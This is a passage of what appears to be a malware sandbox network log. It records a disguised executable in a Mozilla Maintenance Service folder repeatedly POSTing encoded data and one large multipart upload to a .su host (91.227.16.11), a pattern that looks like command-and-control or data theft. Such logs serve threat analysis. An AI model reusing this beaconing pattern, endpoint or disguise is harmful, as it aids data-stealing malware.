                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.5 | 49731 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:54.722373962 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:54.938949108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:54.939342022 CET | 2596 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:55.174726009 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.5 | 49732 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:55.528637886 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:55.740523100 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:55.740818977 CET | 2592 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:55.979285002 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.2.5 | 49733 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:56.373497009 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:56.583475113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:56.583683014 CET | 2596 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:56.820386887 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    15 | 192.168.2.5 | 49734 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:56.899564981 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:57.112266064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:57.112534046 CET | 1920 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:57.350136042 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    16 | 192.168.2.5 | 49735 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:57.066625118 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:57.275466919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:57.275692940 CET | 2592 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:57.510828972 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    17 | 192.168.2.5 | 49736 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:57.887227058 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:58.096865892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:58.097165108 CET | 2596 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:58.334597111 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    18 | 192.168.2.5 | 49737 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:58.694907904 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:58.911946058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:58.914766073 CET | 2596 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:59.152261972 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    19 | 192.168.2.5 | 49738 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:59.551295042 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:59.762260914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:59.978187084 CET | 2596 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:28:00.215826035 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    20 | 192.168.2.5 | 49739 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:02.083451986 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:02.301127911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:02.301346064 CET | 2596 | OUT | request body (application/octet-stream)


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    21 | 192.168.2.5 | 49740 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:02.597104073 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:02.808135986 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:02.808443069 CET1920OUTData Raw: 54 50 51 5a 5b 5b 55 52 5e 57 5a 51 57 5a 50 5b 54 5d 54 5e 56 54 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPQZ[[UR^WZQWZP[T]T^VTWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B/W:R'#1Z3&/Y2';8&9 V#,/6+\&'?Y1;%Z"!Q*%
                                                                    Mar 5, 2024 22:28:03.065568924 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    22 | 192.168.2.5 | 49741 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:02.771296024 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:02.983547926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:02.983853102 CET2596OUTData Raw: 54 5d 51 59 5b 5a 55 54 5e 57 5a 51 57 5e 50 5a 54 5d 54 5e 56 5c 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]QY[ZUT^WZQW^PZT]T^V\W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,"2R3U!]'&6^,>0;#Y2*0U" P50&' 2!,%Z"!Q*
                                                                    Mar 5, 2024 22:28:03.222820997 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    23 | 192.168.2.5 | 49742 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:03.573340893 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2584
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:03.792252064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:03.795339108 CET2584OUTData Raw: 51 5a 54 5a 5b 57 55 5d 5e 57 5a 51 57 59 50 5b 54 52 54 58 56 5a 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZTZ[WU]^WZQWYP[TRTXVZW_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/$U9]'%%/,1$Z1'! Q"?$^2];%Z"!Q*
                                                                    Mar 5, 2024 22:28:04.033206940 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    24 | 192.168.2.5 | 49743 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:04.389267921 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:04.601300001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:04.601573944 CET2596OUTData Raw: 51 5b 54 5d 5b 56 55 5d 5e 57 5a 51 57 50 50 53 54 50 54 5f 56 5b 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T][VU]^WZQWPPSTPT_V[WYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C8"R'0!36*^,?"3(')<P"Z4W#< &4'_11,%Z"!Q*
                                                                    Mar 5, 2024 22:28:04.841502905 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.2.5 | 49744 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:05.234014034 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:05.445168018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:05.445393085 CET2596OUTData Raw: 51 5b 54 50 5e 5b 55 51 5e 57 5a 51 57 5c 50 5e 54 54 54 5b 56 5b 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[TP^[UQ^WZQW\P^TTT[V[W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C.2-'=_$P*\,10+[%*<6/(6?#^&$$&<Y/)%Z"!Q*=
                                                                    Mar 5, 2024 22:28:05.683638096 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.2.5 | 49745 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:05.279259920 CET | 394 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=----NXSs6uGjFUy79BBdK9dKPvwpKOgkEkW40K
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 141782
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:05.521979094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:05.522361994 CET12860OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 58 53 73 36 75 47 6a 46 55 79 37 39 42 42 64 4b 39 64 4b 50 76 77 70 4b 4f 67 6b 45 6b 57 34 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                    Data Ascii: ------NXSs6uGjFUy79BBdK9dKPvwpKOgkEkW40KContent-Disposition: form-data; name="0"Content-Type: text/plainT_T^^ZPQ^WZQW\P[TWT^VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.5 | 49746 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:06.039627075 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:06.249785900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:06.250010014 CET2596OUTData Raw: 51 5d 54 5b 5e 5c 55 56 5e 57 5a 51 57 5b 50 53 54 53 54 59 56 5c 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]T[^\UV^WZQW[PSTSTYV\WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,1"$3$&X;%38;\&35?'5+&4 1<1,)%Z"!Q*!
                                                                    Mar 5, 2024 22:28:06.485178947 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.5 | 49747 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:06.817329884 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:07.026851892 CET | 25 | IN | HTTP/1.1 100 Continue
